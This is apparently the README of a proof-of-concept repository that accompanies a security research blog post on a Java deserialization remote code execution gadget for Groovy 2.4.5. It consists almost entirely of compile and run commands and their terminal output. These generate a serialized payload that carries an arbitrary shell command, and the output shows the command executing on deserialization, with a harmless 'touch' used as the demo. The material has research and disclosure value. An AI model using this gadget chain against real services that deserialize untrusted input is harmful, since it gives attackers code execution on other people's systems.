groovy-2.4.5-exploit

This is the Java code related to our blog post https://codewhitesec.blogspot.com/2018/01/handcrafted-gadgets.html.

In order to compile the 2 java files you first need to build JRE8Exploit-1.0-SNAPSHOT.jar (project can be found here: https://github.com/pwntester/JRE8u20_RCE_Gadget). And you need a groovy 2.4.5 library, of course.

kai@CodeVM:~/groovy-2.4.5-exploit$ java -version
openjdk version "1.8.0_151"
OpenJDK Runtime Environment (build 1.8.0_151-8u151-b12-0ubuntu0.17.04.2-b12)
OpenJDK 64-Bit Server VM (build 25.151-b12, mixed mode)

Compile code:

kai@CodeVM:~/groovy-2.4.5-exploit$ javac -cp /home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget.java BCSSerializationTest.java

Create BeanContextSupport example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar BCSSerializationTest > bcstest.bin
Writing java.lang.Class at offset 1048
Done writing java.lang.Class at offset 1094
Writing java.util.HashMap at offset 1094
Done writing java.util.HashMap at offset 1172
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19

Deserialize example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser bcstest.bin
{java.beans.beancontext.BeanContextSupport@27d6c5e0=whatever}

Groovy RCE gadget

kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
ls: cannot access './testforblog': No such file or directory
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget exploit "touch ./testforblog" > exploit.bin
Writing org.codehaus.groovy.runtime.MethodClosure at offset 973
Done writing org.codehaus.groovy.runtime.MethodClosure at offset 1490
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19
Adjusting reference from: 4 to: 27
Adjusting reference from: 4 to: 27
Adjusting reference from: 7 to: 30
Adjusting reference from: 1 to: 24
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser exploit.bin
Exception in thread "main" java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.util.Set
	at com.sun.proxy.$Proxy2.entrySet(Unknown Source)
	at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at java.util.HashMap.readObject(HashMap.java:1409)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at Groovy245Gadget.main(Groovy245Gadget.java:43)
kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
-rw-r--r-- 1 kai kai 0 Jan 18 15:29 ./testforblog
kai@CodeVM:~/groovy-2.4.5-exploit$